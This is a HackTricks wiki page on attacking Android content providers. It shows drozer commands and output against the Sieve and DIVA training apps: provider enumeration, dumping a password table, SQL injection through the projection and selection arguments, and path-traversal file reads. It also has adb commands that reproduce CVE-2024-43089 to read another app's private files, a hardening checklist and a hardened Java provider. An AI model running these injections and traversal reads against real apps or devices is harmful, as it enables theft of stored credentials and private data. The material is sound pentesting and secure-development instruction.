mirror of https://github.com/HackTricks-wiki/hacktricks.git, synced 2025-10-10 18:36:50 +00:00
# Exploiting Content Providers

{{#include ../../../banners/hacktricks-training.md}}

## Intro

Data is supplied **from one application to others** on request by a component known as a **content provider**. These requests are handled through the methods of the **ContentResolver class**. Content providers can keep their data in different places, such as a **database**, **files**, or over the **network**.

In the _Manifest.xml_ file, a declaration of the content provider is required. For example:

```xml
<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>
```

To access `content://com.mwr.example.sieve.DBContentProvider/Keys`, the `READ_KEYS` permission is required. It is worth noting that the path `/Keys/` is accessible in the following section, and it is not protected because of a developer mistake: `/Keys` was protected, but `/Keys/` was the path actually declared.

**Maybe you can access private data or exploit some vulnerability (SQL Injection or Path Traversal).**

## Get info from **exposed content providers**

```
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
```

It is possible to work out how to reach the **DBContentProvider** by building URIs that start with "_content://_". This approach is based on what was learned from Drozer, where the key information was found under the _/Keys_ path.

Drozer can **guess and try several URIs**:

```
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
```

You should also review the **ContentProvider code** to look for the queries it runs.

If you cannot find complete queries, you can **check which names the ContentProvider declares** in its `onCreate` method.

The query will look like: `content://name.of.package.class/declared_name`

## **Database-backed Content Providers**

Most Content Providers are probably used as an **interface** to a **database**. Therefore, if you can access one, you may be able to **extract, update, insert and delete** information.\
Check whether you can **access sensitive information**, or try to modify it to **bypass authorisation mechanisms**.

When reviewing the Content Provider code, also **look** for **functions** with names like _query, insert, update and delete_, because you will be able to call them.

### Query content

```
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com
```

### Insert content

Querying the database reveals the **column names**; with those, you may be able to insert data into the DB.

_Note that in insert and update you can use --string to indicate a string, --double to indicate a double, --float, --integer, --long, --short, --boolean_

### Update content

Knowing the column names, you can also **modify entries**.

### Delete content

### **SQL Injection**

It is simple to test for SQL injection **(SQLite)** by manipulating the **projection** and **selection fields** that are passed to the content provider.\
When querying the Content Provider there are 2 interesting arguments to search for information: _--selection_ and _--projection_.

You can try to **abuse** these **parameters** to test for **SQL injection**:

```
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
```

```
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
FROM SQLITE_MASTER WHERE type='table';--"
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |
| table | Passwords | Passwords | 4 | CREATE TABLE ... |
```

**Automatic SQL injection discovery with Drozer**

```
dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
android_metadata
notes
sqlite_sequence
```

## **File System-backed Content Providers**

Content providers can also be used to **access files.**

### Read **files**

You can read files through the Content Provider:

```
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
```

### **Path Traversal**

If you can access files, you can try to abuse a Path Traversal (in this case it isn't necessary, but you can still try "_../_" and similar tricks).

```
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
```

**Automatic Path Traversal discovery with Drozer**

```
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
```

## 2023-2025 Updates & Modern Tips

### Drozer 3.x (Python 3) is out

WithSecure resumed maintenance of drozer in 2022 and ported the framework to **Python 3** (latest **3.1.0 – April 2024**).
Besides the compatibility fixes, new modules that are especially useful when working with Content Providers include:

* `scanner.provider.exported` – list only providers with `android:exported="true"`.
* `app.provider.grant` – automatically call `grantUriPermission()` so you can talk to providers that expect `FLAG_GRANT_READ_URI_PERMISSION` / `FLAG_GRANT_WRITE_URI_PERMISSION` on Android 12+.
* Better handling of **Scoped Storage** so that file-based providers on Android 11+ remain reachable.

Upgrade (host & agent):

```bash
pipx install --force "git+https://github.com/WithSecureLabs/drozer@v3.1.0"
adb install drozer-agent-3.1.0.apk
```

### Using the built-in `cmd content` helper (ADB ≥ 8.0)

All modern Android devices ship with a CLI that can query/update providers **without installing any agent**:

```bash
adb shell cmd content query --uri content://com.test.provider/items/
adb shell cmd content update --uri content://com.test.provider/items/1 \
  --bind price:d:1337
adb shell cmd content call --uri content://com.test.provider \
  --method evilMethod --arg 'foo'
```

Combine this with `run-as <pkg>` or a rooted shell to test internal-only providers.

### Recent real-world CVEs that abused Content Providers

| CVE | Year | Component | Bug type | Impact |
|-----|------|-----------|----------|--------|
| CVE-2024-43089 | 2024 | MediaProvider | Path traversal in `openFile()` | Arbitrary file read from any app's private storage |
| CVE-2023-35670 | 2023 | MediaProvider | Path traversal | Information disclosure |

Re-create CVE-2024-43089 on a vulnerable build:

```bash
adb shell cmd content read \
  --uri content://media/external_primary/file/../../data/data/com.target/shared_prefs/foo.xml
```

### Hardening checklist for API 30+

* Declare `android:exported="false"` unless the provider **must** be public – since API 31 this attribute is mandatory.
* Enforce **permissions** and/or `android:grantUriPermissions="true"` instead of exposing the whole provider.
* Allow-list the permitted `projection`, `selection` and `sortOrder` values (e.g. build queries with `SQLiteQueryBuilder.setProjectionMap`).
* In `openFile()` canonicalise the supplied path (`FileUtils`) and reject `..` sequences to prevent traversal.
* When exposing files, prefer the **Storage Access Framework** or `FileProvider`.
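
The following is an added example, not code from HackTricks, from drozer or from the Sieve app, showing what the checklist above looks like inside a provider. The class name `HardenedProvider`, its authority, the `backup/*` path and the `Passwords` table and column names are all hypothetical. `query()` replaces the string-concatenated SQL whose shape leaks in the `SELECT * FROM Passwords WHERE (')` error above with a `SQLiteQueryBuilder` in strict mode plus a projection map, so both the `--projection` and `--selection` injections shown earlier are rejected before reaching SQLite; `openFile()` canonicalises the requested path before opening it, which is the check whose absence `scanner.provider.traversal` reports.

```java
import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.Context;
import android.content.UriMatcher;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import android.os.ParcelFileDescriptor;

import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;

// Hypothetical hardened provider (example code, not Sieve's). Manifest entry it assumes:
//   <provider android:name=".HardenedProvider"
//             android:authorities="com.example.hardened.provider"
//             android:exported="false"
//             android:grantUriPermissions="true" />
public class HardenedProvider extends ContentProvider {
    private static final String AUTHORITY = "com.example.hardened.provider"; // assumed authority
    private static final int PASSWORDS = 1;
    private static final int BACKUP_FILE = 2;
    private static final UriMatcher MATCHER = new UriMatcher(UriMatcher.NO_MATCH);
    // Allow-list of columns a caller may name in projection, selection or sortOrder.
    private static final Map<String, String> PASSWORD_COLUMNS = new HashMap<>();

    static {
        MATCHER.addURI(AUTHORITY, "Passwords", PASSWORDS);
        MATCHER.addURI(AUTHORITY, "backup/*", BACKUP_FILE);
        PASSWORD_COLUMNS.put("_id", "_id");
        PASSWORD_COLUMNS.put("service", "service");
        PASSWORD_COLUMNS.put("username", "username");
        // "password" is deliberately absent: the provider never returns it, so a projection
        // naming it (or "* FROM SQLITE_MASTER ...") fails with IllegalArgumentException.
    }

    private DbHelper helper;

    @Override
    public boolean onCreate() {
        helper = new DbHelper(getContext());
        return true;
    }

    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        if (MATCHER.match(uri) != PASSWORDS) {
            throw new IllegalArgumentException("Unknown URI " + uri);
        }
        // The vulnerable shape this replaces is concatenation such as
        //   db.rawQuery("SELECT " + projection + " FROM Passwords WHERE (" + selection + ")", null)
        // which is what the "unrecognized token" error in the drozer output reveals.
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("Passwords");
        qb.setProjectionMap(PASSWORD_COLUMNS); // projection columns must be in the map
        qb.setStrict(true);                    // selection/sortOrder may only reference mapped columns
        return qb.query(helper.getReadableDatabase(), projection, selection, selectionArgs,
                null, null, sortOrder);
    }

    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        if (MATCHER.match(uri) != BACKUP_FILE || !"r".equals(mode)) {
            throw new FileNotFoundException("Not readable: " + uri);
        }
        File root = new File(getContext().getFilesDir(), "backup");
        File requested = new File(root, uri.getLastPathSegment());
        String rootPath, reqPath;
        try {
            // Canonical paths resolve "..", symlinks and %2F-encoded separators
            // (getLastPathSegment() decodes them), so the prefix check cannot be bypassed.
            rootPath = root.getCanonicalPath() + File.separator;
            reqPath = requested.getCanonicalPath();
        } catch (IOException e) {
            throw new FileNotFoundException("Cannot resolve " + uri);
        }
        if (!reqPath.startsWith(rootPath)) {
            throw new FileNotFoundException("Path escapes backup dir: " + uri);
        }
        return ParcelFileDescriptor.open(requested, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    // Read-only provider: writes are refused instead of being forwarded to the database.
    @Override public Uri insert(Uri uri, ContentValues values) { throw new UnsupportedOperationException(); }
    @Override public int update(Uri uri, ContentValues v, String sel, String[] args) { throw new UnsupportedOperationException(); }
    @Override public int delete(Uri uri, String sel, String[] args) { throw new UnsupportedOperationException(); }
    @Override public String getType(Uri uri) { return "vnd.android.cursor.dir/vnd.example.password"; }

    private static class DbHelper extends SQLiteOpenHelper {
        DbHelper(Context ctx) { super(ctx, "hardened.db", null, 1); }
        @Override public void onCreate(SQLiteDatabase db) {
            db.execSQL("CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, username TEXT, password TEXT)");
        }
        @Override public void onUpgrade(SQLiteDatabase db, int oldV, int newV) { }
    }
}
```

With this provider, `run app.provider.query ... --selection "'"` raises `IllegalArgumentException` inside the provider instead of an SQLite parse error, `scanner.provider.injection` reports no injectable URIs, and `app.provider.read` on a `backup/..%2F..%2Fetc%2Fhosts`-style URI is refused by the canonical-path check. The `getType()` MIME string is illustrative only.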

These changes in newer Android releases mean that many of the old exploitation techniques still work, but they require extra flags/permissions that the updated drozer modules or the `cmd content` helper can automate.

## References

- [https://www.tutorialspoint.com/android/android_content_providers.htm](https://www.tutorialspoint.com/android/android_content_providers.htm)
- [https://manifestsecurity.com/android-application-security-part-15/](https://manifestsecurity.com/android-application-security-part-15/)
- [https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf)
- [https://github.com/WithSecureLabs/drozer/releases/tag/3.1.0](https://github.com/WithSecureLabs/drozer/releases/tag/3.1.0)
- [https://source.android.com/security/bulletin/2024-07-01](https://source.android.com/security/bulletin/2024-07-01)

{{#include ../../../banners/hacktricks-training.md}}